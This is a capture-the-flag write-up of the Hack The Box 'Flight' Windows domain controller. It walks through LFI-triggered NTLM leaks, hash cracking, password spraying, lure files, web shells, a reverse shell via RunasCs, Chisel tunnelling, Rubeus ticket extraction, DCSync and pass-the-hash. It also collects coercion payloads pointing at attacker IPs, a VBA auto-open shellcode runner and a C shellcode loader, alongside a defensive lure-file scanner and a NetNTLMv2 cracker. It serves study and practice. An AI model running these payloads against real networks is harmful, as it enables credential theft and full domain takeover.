[Meachines] [Hard] Flight LFI+NTLM-Leak+SID+SMBD+ntlm_theft+RunasCS+KTOR+Virtual-Account-DCSYNC
Word count: 1670 | 2025-08-29 22:41:39
Windows Domain Penetration Deep Dive: From Information Gathering to DCSync
1. Information gathering
1.1 Initial scan
Port scanning with nmap and masscan (masscan finds the open ports quickly, nmap then fingerprints only those):
ip='10.10.11.187'; itf='tun0'
# Reachability check: -sn alone does host discovery. The original also passed -Pn,
# which tells nmap to assume the host is up, so the "Host is up" test always passed.
if nmap -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    # masscan every TCP and UDP port; output lines look like
    # "Discovered open port 53/tcp on 10.10.11.187", so field 4 is "53/tcp"
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -nu | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        # version detection and default scripts on the discovered ports only
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
Scan results:
- 53/tcp: DNS
- 80/tcp: HTTP (Apache 2.4.52)
- 88/tcp: Kerberos
- 135/tcp: MSRPC
- 139/tcp: NetBIOS
- 389/tcp: LDAP (Active Directory)
- 445/tcp: SMB
- Others: 464 (kpasswd), 593 (RPC over HTTP), 636 (LDAPS), 3268/3269 (Global Catalog), 9389 (AD Web Services), etc.
DNS, Kerberos, LDAP and the Global Catalog on one host mean this is a domain controller.
1.2 Subdomain enumeration
Subdomain (virtual host) enumeration with a custom script; the hosts entry is needed first because the web server routes on the Host header:
echo '10.10.11.187 flight.htb' | sudo tee -a /etc/hosts
./ffbuster.sh -u 'http://flight.htb' -i '10.10.11.187'
Subdomain found (add it to /etc/hosts as well):
- http://school.flight.htb/
1.3 Anonymous LDAP query test
Try unauthenticated (anonymous simple bind) searches:
ldapsearch -x -H ldap://10.10.11.187 -b "dc=flight,dc=htb" "(objectClass=*)"
ldapsearch -x -H ldap://10.10.11.187 -b "dc=school,dc=flight,dc=htb" "(objectClass=*)"
Result: authentication required (anonymous bind is not permitted).
1.4 SMB enumeration
List SMB shares (null session):
smbclient -L //10.10.11.187 -m SMB2
1.5 DNS queries
Query the zone's records:
dig @10.10.11.187 flight.htb ANY
The SOA/NS records name the primary DNS server, g0.flight.htb, which is also the domain controller.
2. Exploitation
2.1 LFI and NTLM leak
school.flight.htb has a local file inclusion: the view parameter takes an arbitrary path and the server reads it back:
http://school.flight.htb/Index.php?view=C:/windows/win.ini
On Windows the same code path accepts a UNC path. The Apache service account then tries to open the share and authenticates to the attacker's host over SMB, so the LFI leaks that account's NetNTLMv2 response:
- Start Responder on the VPN interface:
responder -I tun0
- Trigger the outbound authentication:
curl 'http://school.flight.htb/Index.php?view=//10.10.16.3/SEND'
Captured NetNTLMv2 hash (truncated here):
svc_apache::flight:25a841660b3964af...
A NetNTLMv2 response cannot be used for pass-the-hash; it has to be cracked offline (hashcat mode 5600) or relayed while the connection is live:
hashcat -m 5600 -a 0 hashes.txt rockyou.txt
Recovered credentials:
- Username: svc_apache
- Password: S@Ss!K@*t13
2.2 SMB enumeration and SID collection
Enumerate shares with the recovered credentials:
smbmap -H 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13'
Shares found: NETLOGON, Shared, SYSVOL, Users, Web
Collect SIDs (RID brute force over LSARPC) with lookupsid.py (the password is S@Ss!K@*t13, the '*' was lost in the original):
lookupsid.py 10.10.11.187/svc_apache:'S@Ss!K@*t13'@10.10.11.187
Several accounts and groups come back, including:
- Administrator
- Guest
- krbtgt
- Domain Admins (a group, not a user)
- svc_apache
- S.Moon
- C.Bum, etc.
2.3 Password spraying
Spray the recovered password across the user list (SidTypeUser entries only) with CrackMapExec:
crackmapexec smb 10.10.11.187 -u ./users -p 'S@Ss!K@*t13' --continue-on-success
Result: S.Moon uses the same password (password reuse).
2.4 Summary of NTLM leak techniques
Other ways to coerce a Windows host into authenticating to an attacker-controlled UNC path (collected from Osanda Malith's write-up; the @OsandaMalith share names are his placeholders). Every one of them ends in the same place: an outbound SMB (or WebDAV) connection that carries a NetNTLM response for Responder to capture:
- LFI:
http://host.tld/?page=//11.22.33.44/@OsandaMalith
- XXE:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" >]>
<root>
<name></name>
<tel></tel>
<email>OUT&xxe;OUT</email>
<password></password>
</root>
- XPath injection (doc()):
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
- MySQL injection (load_file()):
http://host.tld/index.php?id=1' union select 1,2,load_file('\\\\192.168.0.100\\@OsandaMalith'),4;%00
- Regsvr32:
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
- Batch file / cmd built-ins (any of these resolves the UNC path):
echo 1 > //192.168.0.1/abc
pushd \\192.168.0.1\abc
cmd /k \\192.168.0.1\abc
cmd /c \\192.168.0.1\abc
start \\192.168.0.1\abc
mkdir \\192.168.0.1\abc
type \\192.168.0.1\abc
dir \\192.168.0.1\abc
- Autorun.inf:
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
- SCF file (the icon is resolved as soon as Explorer renders the folder):
[Shell]
Command=2
IconFile=\\35.164.153.224\test.ico
[Taskbar]
Command=ToggleDesktop
- Desktop.ini:
mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini
- Shortcut file (.lnk), created with VBScript:
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "StealMyHashes.lnk"))
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
sc.WindowStyle = 1
sc.HotKey = "Ctrl+Alt+O"
sc.IconLocation = "%windir%\system32\shell32.dll, 3"
sc.Description = "I will Steal your Hashes"
sc.Save
- PowerShell:
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "$env:windir\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
- Internet shortcut (.url):
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
- Registry autorun keys (point a Run/RunOnce value at a UNC path):
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
- Word/Excel macro (VBA shellcode runner; the shellcode bytes are elided in the source):
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As LongPtr, _
ByRef Source As Any, _
ByVal Length As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As Long, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As Long, _
ByRef Source As Any, _
ByVal Length As Long) As Long
#End If
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Sub Auto_Open()
Dim source As Long, i As Long
#If Vba7 Then
Dim lpMemory As LongPtr, lResult As LongPtr
#Else
Dim lpMemory As Long, lResult As Long
#End If
Dim bShellcode(376) As Byte
' Shellcode here...
lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
For i = LBound(bShellcode) To UBound(bShellcode)
source = bShellcode(i)
lResult = RtlMoveMemory(lpMemory + i, source, 1)
Next i
lResult = CreateThread(0, 0, lpMemory, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
- C shellcode loader:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(void) {
    /* Shellcode that opens a UNC path. A string literal lives in a read-only
       section, so the page must be made executable before it is called. */
    char *shellcode = "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
                      "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
                      // ... more shellcode ...
                      "\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
    DWORD oldProtect;
    /* strlen() stops at the first NUL, so this only works because the shellcode is NUL-free */
    wprintf(L"Length : %zu bytes\n@OsandaMalith", strlen(shellcode));
    BOOL ret = VirtualProtect(shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
    if (!ret) {
        fprintf(stderr, "%s", "Error Occured");
        return EXIT_FAILURE;
    }
    ((void(*)(void))shellcode)();   /* jump into the now-executable buffer */
    VirtualProtect(shellcode, strlen(shellcode), oldProtect, &oldProtect);
    return EXIT_SUCCESS;
}
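Every file-based trigger in the list above works the same way: a key=value in a format Explorer or a shell handler parses (IconFile, IconResource, URL, open) whose value is a UNC or file:// path on a host the attacker controls. As an added example, not from the original post or from any of the tools named on this page, the Python scanner below is the defender's counterpart: it walks a share, parses those text formats and flags any such reference to a host outside an allowlist, marking the keys Explorer resolves without a click. The sample files it writes are constructed; .lnk is a binary format that needs a real parser and is deliberately out of scope.

```python
"""Flag NTLM-leak lure files (SCF, .url, desktop.ini, autorun.inf) dropped on a share."""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Iterable, Iterator, List, Set, Tuple

# Text formats Explorer parses on its own. .lnk is binary and out of scope here.
LURE_EXTENSIONS = {".scf", ".url", ".ini", ".inf"}
# Values Explorer resolves while rendering the folder (icons), or that autorun/URL handlers
# open; a remote host in one of these means an automatic SMB authentication, no click needed.
AUTO_RESOLVED_KEYS = {"iconfile", "iconresource", "url", "open", "icon"}
# \\host\... (UNC) or file://host/... ; http(s) URLs are deliberately not matched.
REMOTE_HOST_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9._-]+)[\\/]", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    key: str
    host: str
    auto_resolved: bool  # True when the key alone is enough to trigger authentication


def remote_refs(text: str) -> Iterator[Tuple[str, str]]:
    """Yield (key, host) for every key=value line whose value points at a remote host."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("[", ";", "#")) or "=" not in line:
            continue  # section headers, comments, blank lines
        key, value = line.split("=", 1)
        for m in REMOTE_HOST_RE.finditer(value):
            yield key.strip().lower(), m.group(1).lower()


def scan_file(path: str, allowed_hosts: Set[str]) -> List[Finding]:
    if os.path.splitext(path)[1].lower() not in LURE_EXTENSIONS:
        return []
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        text = fh.read()
    return [Finding(path, key, host, key in AUTO_RESOLVED_KEYS)
            for key, host in remote_refs(text) if host not in allowed_hosts]


def scan_share(root: str, allowed_hosts: Iterable[str] = ()) -> List[Finding]:
    """Walk a mounted share (or a copy of it) and collect every suspicious reference."""
    allowed = {h.lower() for h in allowed_hosts}
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            findings.extend(scan_file(os.path.join(dirpath, name), allowed))
    return findings


def build_sample_share(root: str) -> None:
    """Write constructed sample files (not artefacts from the box): four lures pointing at an
    attacker IP, one benign desktop.ini and one icon reference to a sanctioned file server."""
    samples = {
        "lure.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.16.3\\share\\test.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
        "stealMyHashes.url": "[InternetShortcut]\r\nURL=file://10.10.16.3/@share\r\n",
        "openMe/desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\10.10.16.3\\aa\r\n",
        "autorun.inf": "[autorun]\r\nopen=\\\\10.10.16.3\\setup.exe\r\nicon=something.ico\r\n",
        "docs/desktop.ini": "[.ShellClassInfo]\r\nIconResource=%SystemRoot%\\system32\\shell32.dll,4\r\n",
        "tools/settings.ini": "[Icons]\r\nIconFile=\\\\fileserver01\\icons\\app.ico\r\n",
    }
    for rel, content in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8", newline="") as fh:
            fh.write(content)


def demo(allowed_hosts: Iterable[str] = ("fileserver01",)) -> List[Finding]:
    """Build the constructed sample share in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        return scan_share(tmp, allowed_hosts)


if __name__ == "__main__":
    for f in demo():
        print(f"{'AUTO' if f.auto_resolved else 'info'} {f.host:<12} {f.key:<13} {f.path}")
```

Run it against a copy of the share (or over the SMB mount) on a schedule: the same four files ntlm_theft drops in 2.5 are exactly what this reports, and the allowlist keeps legitimate icon references to the real file server quiet.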
2.5 Generating lure files with ntlm_theft
ntlm_theft writes the file-based triggers from the list above (.scf, .url, .lnk, desktop.ini, Office documents and more), all pointing at the attacker's IP:
python3 ntlm_theft.py -g all -s 10.10.16.3 -f exp
Upload them to the Shared share, which S.Moon can write to, and wait for a user to browse the folder; Explorer resolves the icon and target UNC paths by itself, no click required:
smbclient //10.10.11.187/Shared -U 'S.Moon%S@Ss!K@*t13'
smb: \> prompt off
smb: \> mput *
Captured NetNTLMv2 hash (truncated here):
c.bum::flight.htb:e7919f91ff88c3c...
Crack it the same way:
hashcat -m 5600 -a 0 hashes.txt rockyou.txt
Recovered credentials:
- Username: c.bum
- Password: Tikkycoll_431012284
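Both captures above (svc_apache in 2.1 and c.bum in 2.5) are NetNTLMv2 responses, not NT hashes: they cannot be passed-the-hash and have to be cracked offline or relayed while live, and cracking them is exactly what hashcat -m 5600 computes. As an added example, not from the original write-up, the Python below shows that computation end to end: parse Responder's USER::DOMAIN:CHALLENGE:NTPROOF:BLOB line, derive NTLMv2 = HMAC-MD5(NT, upper(user) + domain) and NTProofStr = HMAC-MD5(NTLMv2, challenge || blob), and run a small wordlist against it. It carries its own MD4 because OpenSSL 3 builds of hashlib often refuse hashlib.new('md4'). The server challenge, blob and wordlist are constructed; the sample line is forged from the password recovered above, not from the hash captured on the box.

```python
"""Verify and crack a Responder-format NetNTLMv2 capture (what hashcat -m 5600 does)."""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

_M32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 over the UTF-16LE password."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = [(i % 4) * 4 + i // 4 for i in range(16)]   # 0,4,8,12,1,5,9,13,...
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            aa, bb, cc, dd = dd, _rotl((aa + f(bb, cc, dd) + x[i]) & _M32, (3, 7, 11, 19)[i % 4]), bb, cc
        for i in range(16):  # round 2
            aa, bb, cc, dd = dd, _rotl((aa + g(bb, cc, dd) + x[r2[i]] + 0x5A827999) & _M32, (3, 5, 9, 13)[i % 4]), bb, cc
        for i in range(16):  # round 3
            aa, bb, cc, dd = dd, _rotl((aa + h(bb, cc, dd) + x[r3[i]] + 0x6ED9EBA1) & _M32, (3, 9, 11, 15)[i % 4]), bb, cc
        a, b, c, d = (a + aa) & _M32, (b + bb) & _M32, (c + cc) & _M32, (d + dd) & _M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def parse_netntlmv2(line: str) -> Tuple[str, str, bytes, bytes, bytes]:
    """Split Responder's USER::DOMAIN:SERVER_CHALLENGE:NTPROOF:BLOB line."""
    user, _empty, domain, challenge, proof, blob = line.strip().split(":", 5)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NT, upper(user)+domain), server_challenge || blob).
    Only the user name is upper-cased; the domain is used exactly as the client sent it."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def check_password(line: str, password: str) -> bool:
    user, domain, chal, proof, blob = parse_netntlmv2(line)
    return hmac.compare_digest(ntlmv2_proof(password, user, domain, chal, blob), proof)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack; returns the matching password or None."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if check_password(line, candidate):
            return candidate
    return None


def forge_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a Responder-format line for a known password (used here for a constructed
    test vector; real lines come from Responder's logs directory)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed test vector (NOT the hash captured on the box): made-up server challenge and a
# minimal blob; a real blob carries a timestamp, client nonce and the target-info AV pairs.
_CHALLENGE = bytes.fromhex("1122334455667788")
_BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 8
SAMPLE_LINE = forge_capture("svc_apache", "flight", "S@Ss!K@*t13", _CHALLENGE, _BLOB)
SAMPLE_WORDLIST = ["123456", "password", "Summer2022!", "S@Ss!K@*t13", "Tikkycoll_431012284"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Two HMAC-MD5s per candidate is why these hashes fall quickly to GPUs, and also why the MD4 step above matters: hashcat's `-m 5600` is doing nothing more than this loop at scale, so a long random service-account password is the only real mitigation once the leak exists.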
3. Lateral movement
3.1 Initial shell
c.bum can write to the Web share, which is the document root of the Apache virtual hosts, so a PHP web shell (p0wny-shell) dropped there is served by school.flight.htb:
smbclient //10.10.11.187/Web -U 'c.bum%Tikkycoll_431012284'
smb: \> cd school.flight.htb
smb: \school.flight.htb\> put p0wny.php
Browse to:
http://school.flight.htb/p0wny.php
This shell runs as svc_apache, the Apache service account.
3.2 Switching to c.bum with RunasCs
RunasCs spawns a new process with c.bum's credentials and sends it to a listener (start one on the attacker side first, e.g. nc -lvnp 443):
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/RunasCs.exe' -OutFile 'RunasCs.exe'"
RunasCs.exe c.bum Tikkycoll_431012284 -r 10.10.16.3:443 powershell
user.txt:
0d28859d267bd9b701fdedb4b5b1df0c
3.3 Probing internal services with KTOR
KTOR is a PowerShell script that probes for HTTP servers bound to the local host and the internal network:
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/ktor.ps1' -OutFile 'ktor.ps1'"
.\ktor.ps1 -Local
Findings:
- 127.0.0.1:80 - HTTP detected - Title: g0 Aviation
- 127.0.0.1:8000 - HTTP detected - Title: Flight - Travel and Tour (bound to loopback only, hence the tunnel in 3.4)
3.4 Tunnelling with Chisel
- Attacker side, server that accepts reverse port forwards:
chisel server -p 8888 --reverse
- Target side, reverse-forward attacker port 8001 to the internal port 8000:
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/chisel.exe' -OutFile 'chisel.exe'"
.\chisel.exe client 10.10.16.3:8888 R:8001:127.0.0.1:8000
The internal site is now reachable from the attacker's machine at:
http://127.0.0.1:8001/
3.5 Uploading an ASPX web shell
The port-8000 site is IIS. Check whether c.bum can write to its web root (the development directory):
icacls development
Drop an ASPX web shell into it:
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/shell.aspx' -OutFile 'shell.aspx'"
Browse to it through the tunnel:
http://127.0.0.1:8001/shell.aspx
This shell does not run as c.bum but as the IIS application pool identity, a virtual account; that distinction is what the next section exploits.
4. Privilege escalation
4.1 Extracting a Kerberos ticket with Rubeus
- Identify the domain controller:
nltest /dsgetdc:flight.htb
Domain controller: g0.flight.htb (the host we already have a shell on)
- Download Rubeus:
powershell -exec bypass -c "Invoke-WebRequest 'http://10.10.16.3/Ad-Domain/Rubeus.exe' -OutFile 'Rubeus.exe'"
- Extract a TGT with tgtdeleg:
.\Rubeus.exe tgtdeleg /nowrap
Why this works: the ASPX shell runs as an IIS application pool virtual account, and virtual accounts authenticate on the network as the computer account, here G0$. tgtdeleg requests a delegation-enabled service ticket (by default for the domain controller), and the GSS-API/Kerberos delegation trick leaves a forwarded TGT inside the AP-REQ's KRB-CRED, which Rubeus decrypts with the session key it can read from its own logon session; no administrator rights or LSASS access are needed. Because G0$ is the domain controller's own computer account, it holds the directory replication rights that DCSync relies on.
Kerberos TGT (base64-encoded .kirbi, omitted here):
(base64 blob)
4.2 Converting the ticket with minikerberos
Rubeus prints the ticket as base64. Decode it into a .kirbi file, convert that to the ccache format impacket expects, and point KRB5CCNAME at the result (the original exported a relative path that did not match the file it had just written):
echo '<base64 from Rubeus>' | base64 -d > /tmp/ticket.kirbi
minikerberos-kirbi2ccache /tmp/ticket.kirbi /tmp/ticket.ccache
export KRB5CCNAME=/tmp/ticket.ccache
4.3 DCSync
- Synchronise the clock with the DC first; Kerberos rejects a skew of more than five minutes (KRB_AP_ERR_SKEW). sntp alone only reports the offset, so make sure the clock is actually adjusted (e.g. sudo ntpdate flight.htb):
sntp flight.htb
- Run DCSync with the G0$ ticket; with -k and an empty user impacket takes the principal and realm from the ccache:
secretsdump.py -k -no-pass g0.flight.htb -just-dc-user administrator
Administrator secrets returned:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
The LM field aad3b435b51404eeaad3b435b51404ee is the hash of an empty LM password (LM storage is disabled); the NT hash in the next field is the one pass-the-hash uses.
4.4 Administrator shell
Pass the hash to psexec.py (format LM:NT; the LM half is the empty placeholder shown above):
psexec.py administrator@flight.htb -hashes aad3b435b51404eeaad3